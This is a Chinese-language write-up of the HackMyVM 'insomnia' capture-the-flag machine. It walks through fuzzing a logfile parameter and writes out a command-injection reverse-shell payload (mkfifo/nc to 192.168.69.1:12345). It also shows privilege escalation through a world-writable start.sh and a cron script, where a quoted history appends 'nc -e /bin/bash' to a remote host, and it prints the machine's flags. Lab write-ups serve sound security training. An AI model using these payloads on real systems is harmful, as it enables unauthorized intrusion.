hackmyvm-insomnia

扫描开了个8080，打开是个聊天室，感觉是要打xss，但又不知道一个单靶机打XSS有什么用，先放放

‍

扫描发现有个/administration.php

You are not allowed to view : Your activity has been logged

fuzz下参数

仿佛是logfile

再测试下有什么好注入的。打着打着服务挂了，难受。重启再试试可以反弹shell，但带了个exit。

最后确认反弹shell的语句是;rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|bash+-i+2>%261|nc+192.168.69.1+12345+>/tmp/f;

上去看看提权，发现一个很明显的提权点，start.sh是777权限，可以随意修改，写个反弹shell获得julia权限

user.txt julia@insomnia:~$ cat user.txt cat user.txt

USER INSOMNIA 

Flag : [c2e285cb33cecdbeb83d2189e983a8c0]

获得user.txt - c2e285cb33cecdbeb83d2189e983a8c0

sudo没密码用不了，看看history

julia@insomnia:~$ cat .bash_history cat .bash_history clear export TERM=xterm clear ls sudo -l cd /home/rose/ ls ls -l ls -la cat user.txt echo "/bin/bash" >> .plantbook sudo -l sudo -u root /bin/bash /home/rose/.plantbook exigt exit ls cd . cd clear ls cat /etc/passwd passwd sudo passwd exit cd ls cat user.txt ls cd /var/cron ls nano chech.sh export TERM=xterm nano check.sh echo "nc -e /bin/bash 10.0.2.13 4444" >> check.sh exit

发现有个定时任务，继续如法炮制反弹shell

获得root.txt - c84baebe0faa2fcdc2f1a4a9f6e2fbfc

摘要

1. 初始发现
   
   ：发现8080端口开放了一个聊天室，怀疑存在XSS漏洞，但不确定单靶机XSS的利用价值。
2. 目录扫描
   
   ：发现/administration.php页面，显示访问受限且活动被记录。
3. 参数模糊测试
   
   ：发现logfile参数可能易受攻击，测试过程中服务崩溃，重启后尝试反弹shell。
4. 反弹shell成功
   
   ：使用命令;rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|bash+-i+2>%261|nc+192.168.69.1+12345+>/tmp/f;成功获取shell。
5. 提权
   
   ：发现start.sh具有777权限，通过修改该文件获取julia用户权限，并获取user.txt：c2e285cb33cecdbeb83d2189e983a8c0。
6. 进一步提权
   
   ：通过历史命令发现定时任务，利用类似方法反弹shell获取root权限，最终获得root.txt：c84baebe0faa2fcdc2f1a4a9f6e2fbfc。

‍

原文始发于微信公众号（BlueIris）：hackmyvm-insomnia